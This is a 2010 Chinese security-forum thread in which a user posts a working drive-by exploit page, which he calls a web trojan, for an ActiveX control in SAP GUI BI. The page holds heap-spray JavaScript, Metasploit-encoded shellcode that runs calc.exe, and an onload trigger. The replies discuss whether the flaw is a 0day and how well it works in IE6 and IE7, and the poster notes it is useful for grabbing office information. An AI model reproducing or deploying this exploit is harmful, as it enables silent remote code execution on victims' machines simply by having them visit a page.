首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 看雪社区
  2. 二进制漏洞
    3. 发新帖
[原创]新的web远程执行代码漏洞(含测试代码)看雪首发
2010-7-20 21:45 4086

[原创]新的web远程执行代码漏洞(含测试代码)看雪首发

freebsdlin 活跃值
2010-7-20 21:45
4086
确切的说这个就是一个典型的网马!转载请说明看雪谢谢了。。本来这个真的不想发了!说实话也不是很好用!
<!--

Product: SapGUI BI
File: c:\program files\sap\business explorer\bi\wadmxhtml.dl
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  
KillBitSet: False

Vulnerable Property: Tags
-->
<html>
<head>
  <title></title>
  <script language="JavaScript" defer>

    var buf = '';
    while (buf.length < 64) buf += unescape("%u0a05");

    function Check() {
       
        // windows/exec - 557 bytes
        // http://www.metasploit.com
        // Encoder: x86/alpha_mixed
        // EXITFUNC=process, CMD=c:\\windows\\system32\\calc.exe
        var shellcode = unescape("%uc2dd%uc92b%u38b1%u4fba%uc033%ud9a3%u2474%u5ef4%u5631%u031a%u1a56%uc683%ue204%ucfba%u2a28%u3044%u4da9%ud5cd%u5f98%u9ea9%u6f89%uf3ba%u1b21%ue7ee%u69b2%u0726%uc772%u2610%ue983%ue49c%u6b47%uf760%u4b9b%u3859%u8aee%u259e%ude01%u2177%ucfb0%u77fc%uf109%uf3d2%u8931%uc357%u23c6%u1456%u3f76%u8c10%u67fc%uad80%u7bd1%ue4fc%u4f5e%uf777%u81b6%uc978%u4ef6%ue547%u8ffa%uc280%ue5e4%u30fa%ufd98%u4a39%u8b46%uecdf%u2b0d%u0c3b%uaac1%u02c8%ub9ae%u0696%u6d31%u33ad%u90ba%ub261%ub6f8%u9ea5%ud65b%u7afc%ue70d%u221e%u4df2%uc155%uf4e7%u8c34%u75f6%ue943%u85f9%u5a4b%ub492%u35c0%u48e5%u7203%u0319%ud309%ucab2%u61d8%uecdf%ua537%u6ee6%u56bd%u6e1d%u53b4%u2859%u2e25%uddf2%u9d49%uf7f3%u1b2a%ua450%u32db%u3006%ub24c%ue4a5%u4fce%u6633%uca9a%ubbae%u4950%udf6d%u1df5%u31ee%ua590%u4d95");        
       
        var bigblock = unescape("%u0c0c");
        var headersize = 20;
        var slackspace = headersize + shellcode.length;
        while (bigblock.length < slackspace) bigblock += bigblock;
        var fillblock = bigblock.substring(0,slackspace);
        var block = bigblock.substring(0,bigblock.length - slackspace);
        while (block.length + slackspace < 0x40000) block = block + block + fillblock;

       
        var memory = new Array();
        for (i = 0; i < 550; i++){ memory[i] = block + shellcode; }
                       
        var jmpblock = buf.substring(0, 32);

        var a = new Array();
       
        for (i = 0; i < 512; i++) {
                obj.Tags = jmpblock.substring(0, jmpblock.length);
                a[i] = obj.Tags.substring(0, obj.Tags.length);
                obj.Tags = '';
                a[i] += jmpblock;
        }       

}

   </script>
  </head>

<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:30DD068D-5AD9-434c-AAAC-46ABE37194EB">
                Unable to create object
        </object>

</body>
</html>

[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞0
打赏
分享
最新回复 (10)
szbigcat
雪    币: 259
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
szbigcat 2010-7-20 22:35
2
0
用的是哪个0day?未公开的?
freebsdlin
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
freebsdlin 2010-7-20 22:36
3
0
未公开。但是国外最早的也是昨天发布的! 国内我用google和baidu一篇也没有。应该是首发!
szbigcat
雪    币: 259
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
szbigcat 2010-7-20 22:52
4
0
http://www.nsfocus.net/vulndb/15448
freebsdlin
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
freebsdlin 2010-7-20 23:01
5
0
szbigcat 深深的对不起- -!我误会了。不过这个代码测试的时候ie6.0并不很好用  (熬夜有点累傻了。请原谅啊兄弟!)
szbigcat
雪    币: 259
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
szbigcat 2010-7-20 23:16
6
0
我只是提供相关漏洞信息,也没说你的代码不是原创首发什么的。。
freebsdlin
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
freebsdlin 2010-7-20 23:27
7
0
在次向szbigcat 至歉!
szbigcat
雪    币: 259
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
szbigcat 2010-7-21 00:39
8
0
呃,大侠,用不着那么严肃。。
freebsdlin
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
freebsdlin 2010-7-21 00:44
9
0
呵呵开玩笑。开玩笑   补充一下 机器必须安装SAP GUI的商务智能 IE6。0我这边测试没跑起来。 刚刚在朋友那可以跑的起来!IE7。0 原因没找到!
下载地址:http://u.115.com/file/f441bd01a    600多M。
   不过这段代码。适合针对获取office信息有用!
hardful
雪    币: 80
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
hardful 2010-7-21 01:06
10
0
mark
谢谢
freebsdlin
雪    币: 62
活跃值: (60)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
freebsdlin 2010-7-21 01:28
11
0
问题在次补充!sap gui 7.1貌似不太好用。但是按照文章显示针对bi 7.0的应该很有效果!  我这边测试7。1版本的没过去。朋友那里执行了。 总之我这边还是大家多测试的比较好!!
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回